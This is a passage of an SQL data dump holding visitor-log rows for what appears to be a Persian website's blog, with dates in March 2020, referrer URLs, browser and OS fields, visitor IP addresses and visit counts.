(809,'2020-03-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(811,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.166.96','000',0,1,0),
(812,'2020-03-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(813,'2020-03-19','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','54.189.38.180','000',0,1,0),
(814,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.189.80','000',0,2,0),
(815,'2020-03-19','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','101.132.131.7','000',0,1,0),
(816,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.188.39','000',0,1,0),
(817,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.147.216','000',0,2,0),
(818,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.166.12','000',0,2,0),
(819,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.118.35','000',0,1,0),
(820,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.45.85','000',0,1,0),
(821,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.15.186','000',0,1,0),
(822,'2020-03-19','http://ictbank.ir/blog','Android Browser','Android','9',NULL,NULL,'','78.47.228.83','000',0,6,0),
(823,'2020-03-19','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.52.254','000',0,1,0),
(824,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.130.223','000',0,1,0),
(825,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.60.225','000',0,3,0),
(826,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.77.122','000',0,4,0),
(827,'2020-03-20','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','204.18.21.215','000',0,6,0),
(828,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.188.39','000',0,8,0),
(829,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.74.148','000',0,4,0),
(830,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.4','000',0,10,0),
(831,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.18.26','000',0,2,0),
(832,'2020-03-20','http://ictbank.ir/blog','iTunes','Unknown','Unknown',NULL,NULL,'','64.137.146.48','000',0,2,0),
(833,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.189.240.149','000',0,1,0),
(834,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.118.35','000',0,2,0),
(835,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.49.79','000',0,3,0),
(836,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.237.136.79','000',0,7,0),
(837,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.125.207','000',0,3,0),
(838,'2020-03-20','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','54.189.38.180','000',0,1,0),
(839,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.166.96','000',0,4,0),
(840,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.167.233','000',0,2,0),
(841,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.175.77','000',0,4,0),
(842,'2020-03-20','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','204.18.97.171','000',0,1,0),
(843,'2020-03-20','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','125.58.89.49','000',0,6,0),
(844,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.38.65','000',0,1,0),
(845,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.163.121.1','000',0,1,0),
(846,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.84.77','000',0,2,0),
(847,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.107.56','000',0,7,0),
(848,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.136.97','000',0,3,0),
(849,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.234.116','000',0,4,0),
(850,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.190.217.123','000',0,8,0),
(851,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.182.75','000',0,4,0),
(852,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.6','000',0,2,0),
(853,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.39.182','000',0,3,0),
(854,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','51.254.21.105','000',0,1,0),
(855,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.86.101','000',0,4,0),
(856,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.101.61','000',0,6,0),
(857,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.50.30','000',0,4,0),
(858,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','3.219.254.95','000',0,11,0),
(859,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.187.39.31','000',0,1,0),
(860,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.25.41','000',0,4,0),
(861,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.79.235','000',0,4,0),
(862,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.21','000',0,10,0),
(863,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.123.147','000',0,3,0),
(864,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.155.91.212','000',0,4,0),
(865,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.200.82','000',0,3,0),
(866,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.103.71','000',0,1,0),
(867,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.100','000',0,6,0),
(868,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.51.251','000',0,2,0),
(869,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.189.80','000',0,1,0),
(870,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','18.188.67.248','000',0,3,0),
(871,'2020-03-20','http://ictbank.ir/blog','Android Browser','Android','7.0',NULL,NULL,'','172.27.244.87','000',0,2,0),
(872,'2020-03-20','http://ictbank.ir/blog','Android Browser','Android','10',NULL,NULL,'','172.27.248.99','000',0,3,0),
(873,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.82.169','000',0,3,0),
(874,'2020-03-20','http://ictbank.ir/blog','iTunes','Unknown','Unknown',NULL,NULL,'','34.243.64.230','000',0,1,0),
(875,'2020-03-20','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','94.242.54.58','000',0,1,0),
(876,'2020-03-20','http://ictbank.ir/blog','iTunes','Unknown','Unknown',NULL,NULL,'','3.87.243.197','000',0,1,0),
(877,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','23.239.26.240','000',0,1,0),
(878,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.3.235','000',0,2,0),
(879,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.20','000',0,6,0),
(880,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.186.32','000',0,3,0),
(881,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.168.248','000',0,2,0),
(882,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.130.223','000',0,1,0),
(883,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.162.190','000',0,1,0),
(884,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.21','000',0,4,0),
(885,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.239.17','000',0,6,0),
(886,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.214.51.124','000',0,1,0),
(887,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.94.123','000',0,3,0),
(888,'2020-03-20','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','35.162.232.176','000',0,3,0),
(889,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.162.119','000',0,7,0),
(890,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.116.111','000',0,3,0),
(891,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.166.233','000',0,1,0),
(892,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.248.96','000',0,4,0),
(893,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.118.198','000',0,1,0),
(894,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','52.12.156.176','000',0,1,0),
(895,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.158.89','000',0,1,0),
(896,'2020-03-20','http://www.bing.com/search?q=amazon','Chrome','OS X','10.15.3',NULL,NULL,'','65.154.226.109','000',0,6,0),
(897,'2020-03-20','http://www.bing.com/search?q=amazon','Safari','iOS','10.3.1',NULL,NULL,'','65.155.30.101','000',0,2,0),
(898,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.41.218','000',0,7,0),
(899,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','130.211.104.224','000',0,2,0),
(900,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.55.39.61','000',0,1,0),
(901,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.78.220','000',0,5,0),
(902,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.221.132.203','000',0,1,0),
(903,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.7','000',0,2,0),
(904,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.94.91','000',0,3,0),
(905,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.45.85','000',0,2,0),
(906,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.147.216','000',0,1,0),
(907,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.165.163','000',0,1,0),
(908,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.237.142.57','000',0,1,0),
(909,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.89.90.89','000',0,1,0),
(910,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.99.33','000',0,2,0),
(911,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.151.65','000',0,2,0),
(912,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.187.57.153','000',0,1,0),
(913,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.62.7','000',0,1,0),
(914,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.33.3.120','000',0,1,0),
(915,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.112.63','000',0,1,0),
(916,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.102','000',0,4,0),
(917,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.114.126','000',0,2,0),
(918,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.3.106','000',0,4,0),
(919,'2020-03-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(920,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.167.71.193','000',0,1,0),
(921,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.153.71','000',0,5,0),
(922,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.249.8','000',0,4,0),
(923,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','173.255.193.93','000',0,1,0),
(924,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.96.80','000',0,5,0),
(925,'2020-03-20','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','34.217.136.243','000',0,2,0),
(926,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.215.47','000',0,5,0),
(927,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.22.99','000',0,3,0),
(928,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.5','000',0,6,0),
(929,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.74.218','000',0,1,0),
(930,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.125.171','000',0,1,0),
(931,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.162.150.108','000',0,1,0),
(932,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.83.217','000',0,1,0),
(933,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.35.38','000',0,2,0),
(934,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.20','000',0,4,0),
(935,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.69.13.232','000',0,2,0),
(936,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.72.29','000',0,3,0),
(937,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.226.146','000',0,4,0),
(938,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.226.147','000',0,2,0),
(939,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.12.95','000',0,2,0),
(940,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.11.31','000',0,3,0),
(941,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.185.147.234','000',0,1,0),
(942,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.103','000',0,2,0),
(943,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.168.128','000',0,2,0),
(944,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.224.210','000',0,1,0),
(945,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.72.151','000',0,4,0),
(946,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.108.64','000',0,1,0),
(947,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.242.234','000',0,4,0),
(948,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.117.84','000',0,2,0),
(949,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.167.153.71','000',0,1,0),
(950,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.189.22.149','000',0,1,0),
(951,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.95.43','000',0,2,0),
(952,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.53.249','000',0,5,0),
(953,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.209.195.65','000',0,1,0),
(954,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.58.13','000',0,3,0),
(955,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.26.16','000',0,1,0),
(956,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.105','000',0,4,0),
(957,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.47.67','000',0,2,0),
(958,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.175.53','000',0,3,0),
(959,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.83.44','000',0,1,0),
(960,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.94.108','000',0,1,0),
(961,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.212.7.93','000',0,1,0),
(962,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.93.8','000',0,3,0),
(963,'2020-03-20','http://www.design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.10.232.135','000',0,3,0),
(964,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.213.101.245','000',0,2,0),
(965,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.72.48','000',0,1,0),
(966,'2020-03-20','http://ictbank.ir/blog','Android Browser','Android','4.1.1',NULL,NULL,'','47.74.137.81','000',0,1,0),
(967,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.52.204','000',0,3,0),
(968,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','18.237.56.12','000',0,1,0),
(969,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.104','000',0,4,0),
(970,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(971,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.216.3','000',0,2,0),
(972,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.225.135','000',0,2,0),
(973,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.148.9','000',0,4,0),
(974,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.52.7','000',0,4,0),
(975,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.185.50.149','000',0,1,0),
(976,'2020-03-20','http://ictbank.ir/blog','Android Browser','Android','9',NULL,NULL,'','78.47.38.32','000',0,3,0),
(977,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.25.145','000',0,2,0),
(978,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.149.233.139','000',0,1,0),
(979,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.90.1','000',0,2,0),
(980,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.136.90','000',0,1,0),
(981,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.113.41','000',0,2,0),
(982,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.28.150','000',0,1,0),
(983,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.151.111','000',0,1,0),
(984,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.218.80.124','000',0,1,0),
(985,'2020-03-20','https://google.com/search?p=3233455265815&gags=13','Firefox','Windows','2.2',NULL,NULL,'','141.98.90.216','000',0,2,0),
(986,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.198.172','000',0,2,0),
(987,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','18.237.245.111','000',0,1,0),
(988,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.249.204','000',0,1,0),
(989,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.192.244','000',0,1,0),
(990,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.181.112','000',0,2,0),
(991,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','146.148.4.94','000',0,2,0),
(992,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.222.87.183','000',0,1,0),
(993,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.79.175','000',0,3,0),
(994,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.123.3','000',0,1,0),
(995,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.44.33','000',0,1,0),
(996,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.65.222.212','000',0,1,0),
(997,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.219.210.38','000',0,1,0),
(998,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.220.90','000',0,1,0),
(999,'2020-03-20','http://ictbank.ir/dashtpodcast/','Instagram','iOS','12.4',NULL,NULL,'','5.211.175.241','000',0,2,0),
(1000,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.4','000',0,6,0),
(1001,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.228.166','000',0,1,0),
(1002,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.69.116.72','000',0,3,0),
(1003,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.2.169','000',0,1,0),
(1004,'2020-03-20','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','5.106.199.103','000',0,1,0),
(1005,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.152.224','000',0,2,0),
(1006,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.208.1.93','000',0,1,0),
(1007,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','99.232.61.211','000',0,1,0),
(1008,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.132.21','000',0,1,0),
(1009,'2020-03-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.33.164.17','000',0,1,0),
(1010,'2020-03-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1011,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.213.121.228','000',0,1,0),
(1012,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.102.0','000',0,1,0),
(1013,'2020-03-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.2.170','000',0,1,0),
(1014,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.53.249','000',0,5,0),
(1015,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.162.119','000',0,4,0),
(1016,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.49.79','000',0,1,0),
(1017,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.254.56','000',0,4,0),
(1018,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.198.172','000',0,5,0),
(1019,'2020-03-21','http://ictbank.ir/blog','iTunes','Unknown','Unknown',NULL,NULL,'','64.137.146.48','000',0,3,0),
(1020,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.99.252','000',0,3,0),
(1021,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.234.116','000',0,2,0),
(1022,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.201.20.157','000',0,1,0),
(1023,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.72.48','000',0,4,0),
(1024,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.86.101','000',0,7,0),
(1025,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.102','000',0,4,0),
(1026,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.220.90','000',0,1,0),
(1027,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.237.136.79','000',0,4,0),
(1028,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.215.47','000',0,3,0),
(1029,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.175.77','000',0,8,0),
(1030,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.74.148','000',0,3,0),
(1031,'2020-03-21','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','54.189.38.180','000',0,3,0),
(1032,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.28.150','000',0,3,0),
(1033,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.41.218','000',0,2,0),
(1034,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','18.206.228.33','000',0,5,0),
(1035,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','3.82.209.119','000',0,2,0),
(1036,'2020-03-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.168.248','000',0,1,0),
